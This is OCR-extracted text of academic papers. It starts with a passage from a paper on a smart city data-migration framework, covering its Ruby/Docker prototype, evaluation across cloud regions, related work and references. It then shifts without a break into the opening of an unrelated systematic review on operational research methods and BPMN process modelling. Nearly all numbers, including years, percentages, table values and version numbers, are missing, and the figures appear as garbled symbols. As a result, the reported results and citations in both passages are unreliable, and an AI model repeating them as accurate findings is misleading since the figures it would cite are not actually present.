the update. once the update is finished the update manager updates the corresponding dai via the repository manager. dependency manager the dependency manager is responsible for resolving unit dependencies between the modeled data entities, as described in the system model above. to achieve this, the dependencies between data entities in the system model are represented as a tree structure. based on this tree structure the dependency manager creates a root node for each dau. it then creates a corresponding leaf node for each dai that is referenced in the dependency section of the dau. after this it checks the related dis and adds them as leaves. for every step the dependency manager also ensures that all security constraints are being met by checking the specific dau with the security manager. if access is not permitted, the resolution is not successful. security manager the security manager is responsible for ensuring that all security constraints that apply to a given dau are being met. to do so it checks to facets of a dau. first, it ensures that a dau description can be accessed by checking the securityconstraints element in the metainformation section. second, it ensures that each view can be accessed as well as migrated by checking the corresponding securityconstraints element in the view sections of the dau. to enable an open and evolvable security system, the security manager relies on pluggable security strategies. examples of such strategies are ldap or oauth or other approaches like rbac (hummer et al., ), but can be extended to any other suitable security mechanism. repository manager the repository manager provides repositories for daus and dais and acts as a distributed registry keeping track of specific deployments and participating entities. it is responsible for storing and retrieving the system model. it manages two distinct system model repositories utilizing distributed key value stores, which store the json-ld files that represent daus and dais in a structured way. the repository manager provides a service interface to access these files as well as a search interface to query daus and dais based on specific elements. additionally, it is responsible for managing dependencies between daus as well as dais and it seamlessly integrates with repository managers of other sdd framework deployments ensuring a complete dau and dai lookup. implementation for evaluation purposes we created a proof of concept prototype of our framework based on a set of restful microservices implemented in ruby and packaged as docker (https://www.docker.com/) containers. every component that exposes a service interface schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.docker.com/ http://dx.doi.org/ . /peerj-cs. relies relies on the sinatra (http://www.sinatrarb.com/) web framework. to enable the message-based communication for the analyzer, handler and update queues we used rabbitmq (https://www.rabbitmq.com/) as message-oriented middleware. the repository manager utilize mongodb (https://www.mongodb.org/) as its storage backend, which enables a distributed, open, and extendable key value store for the dau and dai repositories and provides the foundation for the distributed registry. the sdd proxy was implemented as webrick (https://ruby-doc.org/stdlib- . . /libdoc/webrick/rdoc/webrick.html) proxy server. additionally, we patched the default ruby http class in our prototype implementation to enable the transparent proxy behavior. we implemented the analyzer manager with two analyzer strategies. specifically, we implemented a web request response time analyzer as well as web request response size analyzer, which allowed us to analyze response times as well as average sizes of requests and responses. the migration manager was implemented with two migration strategies. the first strategy was a mongodb strategy supports the migration of mongodb databases and collections, the second one was a docker strategy that enables a docker based container migration. for the update manager we reused the mongodb strategy as mondodb database copy strategy and mondodb collection copy strategy and additionally implemented a file based scp full copy strategy, which transfers files via secure copy (scp). the prototype implementation is available online and can be found at https: //bitbucket.org/jomis/smartdata. evaluation setup as basis for our evaluation we used the urbem smart city application (usca) (schleicher et al., c), a holistic interdisciplinary decision support system, which has been used for city infrastructure planning tasks especially in the context of energy and mobility systems. we choose the usca, because it represents an optimal candidate for our evaluation due to the following characteristics: (i) it heavily relies on a diverse set of data sources, where most of them belong to stakeholders and are under strict security and compliance regulations; (ii) it is an application that has to deal with changing requirements that make it necessary to incorporate new data sources dynamically; (iii) due to the nature of the application as a planning tool for energy and mobility systems it is a common case to incorporate data sources from other cities around the globe. due to the strict data security regulations, we were not allowed to use the original data from the urbem domain for our evaluation scenario. to overcome this limitation, we created anonymized random samples of the most common data sources that are being used in the usca. the specific datasets we used included building data with different granularity levels, thermal and electrical network data as well as mobility data. based on these data sources we created data units (daus) for each of them as well as exemplary data services as technical units (tus). as a next step we looked at the common request patterns for these types of data based on the request history of the usca. since the usca schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.sinatrarb.com/ https://www.rabbitmq.com/ https://www.mongodb.org/ https://ruby-doc.org/stdlib- . . /libdoc/webrick/rdoc/webrick.html https://ruby-doc.org/stdlib- . . /libdoc/webrick/rdoc/webrick.html https://bitbucket.org/jomis/smartdata https://bitbucket.org/jomis/smartdata http://dx.doi.org/ . /peerj-cs. relies on user input via its graphical user interface, we created sample clients, which tested these request patterns in order to enable automated testing. based on these foundations we created two different evaluation scenarios. for the first scenario, we provisioned two vm instances in our private openstack cloud, each with . gb of ram and virtual cpus. these two instances represented data centers in the cities of vienna and melbourne. in order to simulate realistic transfer times between these two different regions we used linux advanced traffic and routing (tc) to simulate the average delay between these regions including common instabilities. each of these instances was running ubuntu . lts with docker. for the second scenario we provisioned three vm instances in the google cloud platform. we used n -standard- instance types each with . gb of ram and virtual cpus. in order to get a realistic geographic distribution, we started each of these instances in different cloud regions. specifically, we started one in the us-central representing the city of berkeley, one in the europe-west region representing the city of vienna and one in the asia-east region representing the city of hong kong. each of these instances was again running ubuntu . lts with docker. for monitoring purposes we used datadog (https://www.datadoghq.com/) as monitoring platform. we submitted custom metrics for request and response times, and monitored system metrics for bytes sent as well as overall instance utilization to ensure over utilization had no impacts on our results. experiments in this section we give a detailed overview of the conducted experiments within the two scenarios. scenario one in the first scenario we wanted to evaluate the impact of sdd in the context of a simple scenario using usca for analytics of two cities. we simulated a case in which stakeholders use usca to compare the impact of city planning scenarios on the building stock, thermal network and public transport between the city of vienna and melbourne. to achieve this we generated data services based on the dau we defined for buildings, networks and mobility as well as the corresponding dais and deployed them as docker containers on the instance representing melbourne. we did the same for the instance in vienna. in the next step we deployed clients simulating the previously mentioned request patterns on the vienna instance. this setup of clients and sources represented a common sample size of clients and services used in the current usca context. as a last step, we deployed the sdd framework, specifically three containers: one for the sdd proxy, one for the repository manager and one for the other components of the sdd framework. an overview of this evaluation scenario can be seen in fig. . in the context of this scenario we distinguished different request types to three different kinds of daus. the first dau, buildings represented a larger data source ( . entities) with low update frequency (once a year). for this resource, we had two request types on two views of this resource; specifically, /buildings and /blocks representing two different schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.datadoghq.com/ http://dx.doi.org/ . /peerj-cs. data service sdd framework container client service vienna melbourne figure evaluation setup for scenario one. levels of detail. the second dau was networks again representing a larger data source ( . entities) with low update frequency (once quarterly). for this resource we had one request type on the only view of this resource, namely /networks. the last dau was mobility representing a smaller data source ( . entities) with high update frequency in the public transport context. to establish a baseline, we started our evaluation with the sdd framework deactivated and monitored the response times of each of these four request types, as well as the transferred bytes from the melbourne instance through custom datadog monitors. after min we started the sdd framework by submitting a request to the sdd manager on the vienna instance via the sdd api with triggers for response times longer than s and a confidence value that matched our automated migrations strategies since we wanted to test the automated capabilities of the sdd framework. after submitting the request, we continued to monitor the results of the datadog monitors over a course of additional min. the results of our evaluation can be seen in fig. . in the figure, we see the different characteristics of the response times for the request types. buildings, blocks as well as networks with longer response times, mobility with a rather short response time. given the submitted triggers as well as the implemented migration strategy in context with size and update characteristics of the daus, buildings, blocks and networks qualified for migration. we see that the framework correctly identified these requests and starts migrating the schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. � � � ����� ����� ����� ����� ����� ����� ����� ����� ����� ����� ����� ���� ������� ������ ����� ���� ������ ��������� � � � � �������� ���� ���� �������� � � � �� �������� ���� ���� �������� � � � � �������� ���� ���� ������ � �� �� �� �������� ���� ���� ��������� figure evaluation results for scenario one. corresponding dais, around minute . the total migration time for all three resources was . seconds during this time the sdd proxy keeps forwarding the requests to the original dai. after the migration has finished and the sdd proxy successfully started redirecting to the new dais, we see a significant reduction in the average response times for all three request types. the mobility source was not migrated since it didn’t qualify due to the fact that this resource had response times below the trigger. we also see that the response time for this resource shows an increase, which is due to the specific proxy implementation and caused by the overhead of redirection checks after the framework has been activated and is present for all request types. the efficiency of the specific proxy implementation was not focus of this work and does not influence the validity of the presented results, since the introduced overhead affects all requests equally. additionally, we see that in this scenario the network transfer from the instance representing melbourne was reduced by % after the migrations finished. this is due to the fact that only the dai for mobility remains active on this instance and no other clients or framework components are actively sending data from melbourne. the aggregated overview in table shows that average and median response times along with variance in response times for all migrated dais were reduced significantly. scenario two in the second scenario we wanted to evaluate the impact of sdd in the context of a larger and more complex scenario using usca for analytics in an internet of cities setup with cities in different regions. we again simulated a case in which stakeholders use usca to compare the impact of city planning scenarios on the building stock, thermal network and public transport. this time between the cities of berkeley, vienna and hong kong, which schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data service sdd framework container client service vienna hong kongberkeley figure evaluation setup for scenario two. table average, median and standard deviation for response times per request type in scenario one. request type status average response time median response time standard deviation response time buildings inactive . s . s . s active . s . s . s blocks inactive . s . s . s active . s . s . s networks inactive . s . s . s active . s . s . s mobility inactive . s . s . s active . s . s . s were placed in the respective regions of the google cloud platform as described in the setup section. to achieve this, we again generated data services based on the dau we defined for buildings, networks and mobility as well as the corresponding dais and deployed them as docker containers on all three instances. in the next step, we deployed clients per city simulating the previously mentioned request patterns. we then deployed the sdd framework, specifically three containers: one for the sdd proxy, one for the repository manager and one for the other components of the sdd framework on every instance. an overview of this evaluation scenario is depicted in fig. . schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. � � � ����� ����� ����� ����� ����� ����� ����� ����� ����� ����� ����� ���� ������� ������ ����� ���� ������ ������� � � � � �������� ���� ���� �������� � � � �� �������� ���� ���� �������� � � � �������� ���� ���� ������ � �� �� �� �������� ���� ���� ��������� figure evaluation results for scenario two. in this scenario we distinguished the same request types as before. to establish a baseline, we started our evaluation with the sdd framework deactivated and monitored the response times of each of these four request types, as well as the transferred bytes from all participating instances through custom datadog monitors. after min we started the sdd framework by submitting a request to the sdd manager on each of the three instances via the sdd api with triggers for response times longer than s and a confidence value that matched our automated migrations strategies since our focus was again on testing the automated capabilities of the sdd framework. after submitting the requests we continued to monitor the results of the datadog monitors over a course of additional min. the results of our evaluation can be seen in fig. . by investigating the figure, we notice that the framework again correctly identified the three request types to buildings, blocks and networks as candidates for migrations. the framework starts migrating the corresponding dais around minute . in this more complex case the total migration time for all three resources over all three instances was . seconds. after the migration has finished and the sdd proxy successfully started redirecting to the new dais we again see a significant reduction in the average response times for all three request types. in terms of network transfer we don’t see a significant reduction as opposed to scenario one since in this setup there are active clients, as well as framework components deployed on all instances that continue to issue requests, hence sending data. the aggregated overview in table shows that average and median response times for all migrated dais again were reduced significantly. in contrast to the lab environment of scenario one, a significant reduction schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table average, median and standard deviation for response times per request type in scenario two. request type status average response time median response time standard deviation response time buildings inactive . s . s . s active . s . s . s blocks inactive . s . s . s active . s . s . s networks inactive . s . s . s active . s . s . s mobility inactive . s . s . s active . s . s . s in response time variance was not observed, which can be attributed to the performance variability of cloud instances as well as the distribution over the chosen regions. our experiments showed that we could significantly reduce the response times and hence the qos for the urbem smart city application. specifically, we showed a reduction of the response times by % on average over all three migrated request types. we also demonstrated that the framework was able to correctly identify the dais to be migrated utilizing the views specified in the corresponding daus. finally, we showed that we could produce these results both in a laboratory setting as well as in a geographically dispersed cloud setup. threats to applicability while the presented system model and framework fulfill the requirements set forth in the context of the previously introduced urbem smart city application, certain threats to the general applicability of sdd remain. the initial evaluation setup for scenario one used tc to introduce the delays between the two instances representing vienna and melbourne. it could be argued that this simulated setup was not representative for the evaluation. the fact that the experiments showed similar results in a globally distributed deployment refute this claim. beyond this, the current evaluation relied on simulated clients and data sources for the experiments. to ensure that the used workloads and data sources are realistic and representative, we gathered workload patterns and anonymized example records from the urbem smart city application used by domain experts. related work the recent trend in smart city research towards the introduction of smart city platforms and reference models has been further fanned by the rise of the internet of things (iot). while all of these approaches mention the importance of data management in the context of the massive amount of data, its heterogeneity and multitude of security and compliance constraints, it currently either is not a framework element or they do not provide specific solutions for this problem. chourabi et al. ( ) present a framework to understand the concepts of a smart citie on a more abstract level. the authors introduce a conceptual framework to comprehend the vital elements in a smart city by identifying critical factors. in schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the context of ict, they identify security, privacy as well as accessibility as central elements for smart city applications. in a similar way, naphade et al. ( ) present innovation challenges for smarter cities. the authors identify the management of information across all cities’ information systems including the need for privacy and security as a central challenge in the success of smart cities underlining the importance of a data management approach like ours. on a more concrete level bonino, pastrone & spirito ( ) present almanac, a smart city platform with a focus on the integration of heterogenous services. they identify challenges smart city applications face, also in terms of infrastructure and specifically mention the importance of taking data ownership and exchange between the different smart city stakeholders into account. compared to our approach, however, they do not provide a specific solution to address these challenges, especially none applicable to legacy data. in the context of iot where more and more data sources emerge, data management plays a central role. jin et al. ( ) introduce a smart city iot infrastructure blueprint. the authors focus on the urban information system starting from the sensory level up to issues of data management and cloud-based integrations. they identify key iot building blocks for a smart city infrastructure, one of them being the so called data-centric iot, in which data management is a central factor. in a similar high level manner, petrolo, loscrì & mitton ( ) introduce the vital platform as an iot integration platform to overcome the fragmentation issue in smart cities. they mention data challenges that arise by introducing iot and specifically underline the importance of privacy and security in this context. the need for data management in order to integrate the produced results also applies to a lot of other iot platforms in order to make their results accessible for further analytics. examples of such frameworks are chen & chen ( ), who present a data acquisition and integration platform for iot. a central element in their architecture is a contextual data platform that needs to integrate with multiple heterogenous data sources. cheng et al. ( ) present cidap a city and data analytics platform based on smartsantander (sanchez et al., ) a large-scale testbed that helps with issues arising from connecting and managing iot infrastructure. they name data management, especially the exchange of data as well as attached semantics as one central challenge. finally, in the context of specific iot smart city applications, kyriazis et al. ( ) present two sustainable smart city applications in the transportation and energy domain. they clearly identify security in the context of data as a specific challenge in enabling these applications emphasizing the importance of approaches like ours. in the context of iot platforms and iot smart city applications our approach provides the missing link for both security aware data management within frameworks, tackling many of the identified challenges as well as providing an ideal way to expose the collected data in a usage-aware distributed way. a vital element to enable this kind of data management in an efficient way is the ability to migrate data resources. in the context of said migration there are several approaches relevant in the context of our work. amoretti et al. ( ) propose an approach that facilitates a code mobility mechanism in the cloud. based on this mechanism, services can be replicated to provide a highly dynamic platform and increase the overall service availability. in a similar way, hao, yen & thuraisingham ( ) discus a cost model and a genetic decision schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm that addresses the tradeoff on both service selection and migration in terms of costs, to find an optimal service migration solution. they introduce a framework for service migration based on this adaptive cost model. opposed to our approach, they focus on the service migration aspect without explicitly addressing the data aspect and do not provide means for incorporating security and other characteristics on a more fine grained data level. in the context of potential migration strategies there are several interesting approaches. agarwal et al. ( ) presents volley, an automated placement approach for distributed cloud services. their approach uses logs to derive access patterns and client locations as input for optimization and hence migration. ksentini, taleb & chen ( ) introduce a service migration approach for follow me clouds based on a markov decision process (mdp). in a similar way, wang et al. ( ) demonstrate a mdp as a framework to design optimal service migration policies. all these approaches can be integrated as potential migration strategies in our approach. conclusion current smart city application models assume that produced data is managed by and bound to its original application. such data silos have emerged, in part due to the complex security and compliance constraints governing the potentially sensitive information produced by current smart city applications. while it is essential to enforce security and privacy constraints, we have observed that smart city data sources can often provide aggregated or anonymized data that can be released for use by other stakeholders or third parties. this is especially promising, as such data sources are not only relevant for other stakeholders in the same city, but also other smart cities around the globe. we argue that future smart city applications will use integrated data from multiple sources, gathered from different cities to significantly improve efficiency and effectiveness of city operations, as well as citizen wellbeing. to allow for the creation of such applications, a seamless and efficient mechanism for description and access of available smart city data is required. in this paper, we presented smart distributed datasets (sdd), a methodology and framework to enable transparent and efficient distributed data access for data sources in smart city environments. a system model that provides a simple abstraction for the technology-agnostic description of available data sources and their subsets was introduced. subsets can represent different aspects and granularities of the original data source, along with relevant characteristics common in the smart city domain. based on this abstraction, we presented the sdd framework, a middleware toolset that enables efficient and seamless data access for smart city applications by autonomously relocating relevant subsets of available data sources to improve quality of service (qos) based on a configurable mechanism that considers request latency, as well as costs for data transfer, storage, and updates. we evaluate the presented framework using a case study in the context of a distributed city infrastructure decision support system and show that selective relocation of data subsets using the sdd framework can improve qos through significantly reducing response times by % on average. in our ongoing work, we will integrate additional optimization mechanisms in the data migration process to further improve framework performance. we also plan to more schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. closely integrate the sdd framework with our overall efforts in designing, engineering, and operating smart city applications (schleicher et al., b). furthermore we will create additional smart city applications, covering different application areas in collaboration with domains experts from urbem, as well as other smart city initiatives. in the context of our research on the future internet of cities, we will extend the sdd framework to support autonomous, ad-hoc coordination of globally distributed sdd proxies to further optimize dai placement in smart city application ecosystems. additional information and declarations funding the research leading to these results has received funding from the urbem doctoral college. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: urbem doctoral college. competing interests schahram dustdar is an academic editor for peerj. author contributions • johannes m. schleicher conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • michael vögler and christian inzinger conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • schahram dustdar reviewed drafts of the paper. data availability the following information was supplied regarding data availability: source code repository for the prototype implementation: https://bitbucket.org/jomis/ smartdata. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references agarwal s, dunagan j, jain n, saroiu s, wolman a, bhogan h. . volley: automated data placement for geo-distributed cloud services. in: proceedings of the th usenix conference on networked systems design and implementation, – . schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://bitbucket.org/jomis/smartdata https://bitbucket.org/jomis/smartdata http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. amoretti m, laghi mc, tassoni f, zanichelli f. . service migration within the cloud: code mobility in sp a. in: proceedings of the international conference on high performance computing & simulation. piscataway: ieee, – doi . /hpcs. . . bonino d, pastrone c, spirito m. . towards a federation of smart city services. in: proceedings of the international conference on recent advances in computer systems, – . chen ys, chen yr. . context-oriented data acquisition and integration platform for internet of things. in: proceedings of the conference on technologies and applications of artificial intelligence. piscataway: ieee, – . cheng b, longo s, cirillo f, bauer m, kovacs e. . building a big data platform for smart cities: experience and lessons from santander. in: proceedings of the international congress on big data. piscataway: ieee, – . chourabi h, nam t, walker s, gil-garcia jr, mellouli s, nahon k, pardo ta, scholl hj. . understanding smart cities: an integrative framework. in: proceedings of the th hawaii international conference on system sciences. piscataway: ieee, – . hao w, yen i-l, thuraisingham b. . dynamic service and data migration in the clouds. in: proceedings of the rd ieee international computer software and applications conference. piscataway: ieee, – . hummer w, gaubatz p, strembeck m, zdun u, dustdar s. . enforcement of entailment constraints in distributed service-based business processes. information and software technology ( ): – doi . /j.infsof. . . . inzinger c, nastic s, sehic s, vögler m, li f, dustdar s. . madcat—a methodol- ogy for architecture and deployment of cloud application topologies. in: proceedings of the international symposium on service-oriented system engineering. piscataway: ieee, – . jin j, gubbi j, marusic s, palaniswami m. . an information framework for creating a smart city through internet of things. ieee internet of things journal ( ): – doi . /jiot. . . ksentini a, taleb t, chen m. . a markov decision process-based service migration procedure for follow me cloud. in: proceedings of the international conference on communications. piscataway: ieee, – . kyriazis d, varvarigou t, white d, rossi a, cooper j. . sustainable smart city iot applications: heat and electricity management amp; eco-conscious cruise control for public transportation. in: proceedings of the th international symposium on ‘‘a world of wireless, mobile and multimedia networks’’. piscataway: ieee, – doi . /wowmom. . . naphade m, banavar g, harrison c, paraszczak j, morris r. . smarter cities and their innovation challenges. computer ( ): – doi . /mc. . . newman s. . building microservices. sebastopool: o’reilly media, inc. schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /hpcs. . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /jiot. . http://dx.doi.org/ . /wowmom. . http://dx.doi.org/ . /mc. . http://dx.doi.org/ . /peerj-cs. petrolo r, loscrì v, mitton n. . towards a smart city based on cloud of things, a survey on the smart city vision and paradigms. transactions on emerging telecommu- nications technologies :e doi . /ett. . sanchez l, muñoz l, galache ja, sotres p, santana jr, gutierrez v, ramdhany r, gluhak a, krco s, theodoridis e, pfisterer d. . smartsantander: iot experi- mentation over a smart city testbed. computer networks (november): – doi . /j.bjp. . . . schleicher jm, vögler m, dustdar s, inzinger c. a. enabling a smart city applica- tion ecosystem: requirements and architectural aspects. ieee internet computing ( ): – . schleicher jm, vögler m, inzinger c, dustdar s. a. smart fabric–an infrastructure- agnostic artifact topology deployment framework. in: proceedings of the international conference on mobile services. piscataway: ieee, – . schleicher jm, vögler m, inzinger c, dustdar s. b. towards the internet of cities: a research roadmap for next-generation smart cities. in: proceedings of the international workshop on understanding the city with urban informatics. new york: acm, – . schleicher jm, vögler m, inzinger c, dustdar s. b. smart brix—a continuous evolution framework for container application deployments. peerj computer science :e doi . /peerj-cs. . schleicher jm, vögler m, inzinger c, fritz s, ziegler m, kaufmann t, bothe d, forster j, dustdar s. c. a holistic, interdisciplinary decision support system for sustainable smart city design. in: proceedings of the international conference on smart cities. cham: springer, – . vögler m, schleicher jm, inzinger c, dustdar s, ranjan r. . migrating smart city applications to the cloud. ieee cloud computing ( ): – . wang s, urgaonkar r, zafer m, he t, chan k, leung kk. . dynamic service mi- gration in mobile edge-clouds. in: proceedings of the th ifip networking conference, – . schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ett. http://dx.doi.org/ . /j.bjp. . . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. approaches combining methods of operational research with business process model and notation: a systematic review approaches combining methods of operational research with business process model and notation: a systematic review hana tomaskova and gerhard-wilhelm weber , university of hradec kralove, faculty of informatics and management, hradec kralove, czech republic faculty of engineering management, poznan university of technology, poznan, poland institute of applied mathematics, middle east technical university, ankara, turkey abstract background: business process modelling is increasingly used not only by the companies’ management but also by scientists dealing with process models. process modeling is seldom done without decision-making nodes, which is why operational research methods are increasingly included in the process analyses. objective: this systematic literature review aimed to provide a detailed and comprehensive description of the relevant aspects of used operational research techniques in business process model and notation (bpmn) model. methods: the web of science of clarivate analytics was searched for studies of that used operation research techniques and business process model and notation, published in english between january and may . the inclusion criteria were as follows: use of operational research methods in conjunction with the bpmn, and is available in full-text format. articles were not excluded based on methodological quality. the background information of the included studies, as well as specific information on the used approaches, were extracted. results: in this research, thirty-six studies were included and considered. a total of specific methods falling into the field of operations research have been identified, and their use in connection with the process model was described. conclusion: operational research methods are a useful complement to bpmn process analysis. it serves not only to analyze the probability of the process, its economic and personnel demands but also for process reengineering. subjects data science, optimization theory and computation, social computing keywords bpmn, business process model and notation, operation research, or, decision making, techniques, review introduction it has been more than years since ‘business process model and notation’ or ‘business process modelling notation’ (bpmn) became the official notation for process modelling. during its lifetime, this notation has gained many users and, thanks to its user- friendliness, it is used in many areas. this wide usage has led to the interconnection and use of other technologies and methods. the fundamental problem of any complex process is decision making. operational research as a popular scientific approach is so often how to cite this article tomaskova h, weber g-w. . approaches combining methods of operational research with business process model and notation: a systematic review. peerj comput. sci. :e doi . /peerj-cs. submitted february accepted september published november corresponding author hana tomaskova, hana.tomaskova@uhk.cz academic editor daniel de oliveira additional information and declarations can be found on page doi . /peerj-cs. copyright tomaskova and weber distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:hana.�tomaskova@�uhk.�cz https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ associated with procedural issues, making its connection to bpmn is more than natural. this article focuses on the analysis of the relationship between the business process model and notation (bpmn) process modelling and specific methods of operational research. business process modelling notation was created by the business process management initiative (bpmi) as an open standards. it is very similar to flowcharts and petri nets but offers much more sophisticated tools to describe and simulate behaviour. silver ( ) stated that this approach is an ‘event-triggered behaviour,’ a description of the ‘something happened’ mode. business process modelling is used to describe, recognize, re-engineer, or improve processes or practices, tomaskova ( ). business process model and notation (bpmn) is the language that is used to model business process steps from start to end. the notation was explicitly designed for wide-ranging use in process analysis, the object management group ( ). bpmn is both intelligible to non-specialists and allows a complicated processes between different participants to be represented. another, very significant feature of bpmn is its ‘business-friendly’ orientation, which is essential for the company’s business and knowledge. operational research (or) is concerned with formulating, modelling, and solving a variety of decision-making situations to find the optimal solutions. the company’s philosophy and decide over business data are the most crucial management actions. the task of the manager is to select in the real system the problem to be analyzed and to formulate it precisely. the standard way of doing this involves the expression of the economic model and then the formulation of a mathematical model. it is necessary to build a simplified model of the real financial systems that only includes the essential elements that describe the formulated problem. the manager has to set the goal of the analysis and subsequent optimization. it is important to define all operations and processes that influence this goal, to describe all the factors, and to verbally express the relationships between the stated purpose and the mentioned processes and factors. the article is divided into the following parts. the “related works and background” section lists research articles that are relevant to a given combination of bpmn and or areas and briefly. that part briefly provides essential information regarding the approaches that are fundamental to this systematic review. the “research methodology” section describes a systematic search, i.e. entry conditions, exclusion criteria and limitations. the “results” section presents the results of the analysis of articles fulfilling the requirements of the systematic review. we analyzed publications according to when they were published, their citations, the scientific areas covered, the cooperation of the authors and their keywords. subsequently, we examined selected articles in terms of methodology, approach and research areas. in the “discussion”, we focus on scientific gaps and future research. we present a research area where we expect an increase in publications, including their specific components. we also discuss the future development of applied methods and approaches. finally, the “conclusion” section summarizes the results and benefits of this study. tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ related works and background the background information and related works are listed in the paragraphs below. we first focused on process modelling and bpmn and then on or and its essential methods and approaches. organizational processes and decision support can be captured in many ways, and for many areas, we can mention, for example: strategic management by: maltz & kohli ( ), certo ( ), tomaskova ( ), maresova ( ), tsakalidis et al. ( ); product development research and innovation implementation, see repenning, , garcia ( ); it and economic analyzes see shane & cable ( ), dedrick, gurbaxani & kraemer ( ), krenek et al. ( ), tomaskova, kuhnova & kuca ( ), maresova, tomaskova & kuca ( ), tomaskova et al. ( ), maresova, sobeslav & krejcar ( ), cheng et al. ( ), tomaskova, kopecky & maresova ( ), tomaskova et al. ( ), kopecky & tomaskova ( ), kopecky & tomaskova ( ); different simulation approaches analysis, see sterman ( ), kozlowski et al. ( ), cimler et al. ( ) or non-standard optimization techniques by: gavalec & tomaskova ( ), bacovsky, gavalec & tomaskova ( ), tomaskova & gavalec ( , ), gavalec, plavka & tomaskova ( ), gavalec, mls & tomaskova ( ), cimler et al. ( ), oudah, jabeen & dixon ( ). some authors have attempted to provide a solution for process model analysis. for example melao & pidd ( ) discussed the strengths and limitations of the various modelling approaches used in business process transformation. the article by glassey ( ) compares three process modelling processes used in case studies. the article by sadiq & orlowska ( ) analyze process models using graph reduction techniques. other authors like van der aalst et al. ( ), krogstie, sindre & jorgensen ( ) use specific tools, frameworks and methods for process analysis and modelling. business process modelling today, process modelling and business process management (bpmn) have a significant impact. process modelling is currently a mainly graphical representation of processes, e.g. in what order particular activities should be implemented and what inputs and outputs the processes require for proper functioning. the primary goal of process modelling is to increase the efficiency and effectiveness of the entire process as well as partial activities. many business process modelling techniques have been proposed over the last decades, so the article recker et al. ( ) comparatively assesses representational analyses of popular process modelling techniques to provide insights into the extent to which they differ from each other. the review business process modelling literature and describe the leading process modelling techniques falling to and before are published in the articl aguilar-saven ( ). the topic of visualization of business process model has been investigated in publication dani, freitas & thom ( ), where the authors performed a systematic literature review of the topic “visualization of business process models”. kalogirou ( ) is a particularly fascinating article that illustrates how ai techniques might play an essential role in the modelling and prediction of the performance and control of the combustion process. although bpm initially focused mainly on the tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ industrial, service and business sectors, it has also appeared in other sectors in recent years. the popularity of bpmn has been confirmed by articles such as zarour et al. ( ), which presents the current state-of-the-art of bpn extensions. publication de ramon fernandez, ruiz fernandez & sabuco garcia ( ) deals with the optimization of clinical processes. business process model and notation business process model and notation is a language for creating business process models silver ( ). under the auspices of the object management group (omg), the business process management initiative (bpmi) created the bpmn as an open standard in by the first version . . in , bpmi merged with the object management group (omg), and the following year, the latter issued the bpmn specification document. in , bpmn version . was developed, and the current version of bpmn . . was released in december . history of bpmn and notation development is a frequent topic of bpmn publications, we can mention nisler & tomaskova ( ), kocbek et al. ( ), chinosi & trombetta ( ), white ( ), van der aalst, adriansyah & van dongen ( ) and recker ( ). bpmn is similar to flowcharts and is based on the concept of petri nets, but it is a more sophisticated and user-friendly language. the graphic form of bpmn makes it understandable even for non-experts. in bpmn, we distinguish several types of elements that we can use in modelling. the specific standards link these elements. in the base classification, we define four groups of items. these are flow objects, connecting objects, swimlanes and artifacts, see the object management group ( ). operational reserach operational research (or) is the well-known approach of using analytical and advanced methods to help make the best possible decisions. as early as , article by authors shannon, long & buckles ( ) presented the results of a survey of the perception of the usefulness and knowledge of the or methodologies commonly used in the practice of industrial engineering. the article by dubey ( ) defines the relationship between or and another branch of sciences. the article gu, goetschalckx & mcginnis ( ) presents a detailed survey of the research on warehouse design, performance evaluation, practical case studies, and computational support tools. the article negahban & smith ( ) provided a review of discrete event simulation publications with a particular focus on applications in manufacturing. or methods are often associated with new technologies. in article sarac, absi & dauzère-pérès ( ), a state-of-the-art on rfid technology deployments in supply chains was given to analyze the impact on the supply chain performance. xu, wang & newman ( ), in their article, tries to identify future trends of computer-aided process planning (capp). dynamic ride-share systems is investigated in the article agatz et al. ( ). linear programming one of the most popular areas of or in practice is linear programming (lp). the mathematical model of linear programming tasks contains a single linear purpose tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ function, and the actual constraints of the problem are described only by linear equations and inequalities. these tasks are most often encountered in economic practices. linear programming has been described in several books: dantzig ( ), schrijver ( ), dorfman, samuelson & solow ( ). multicriterial decision making the solving of 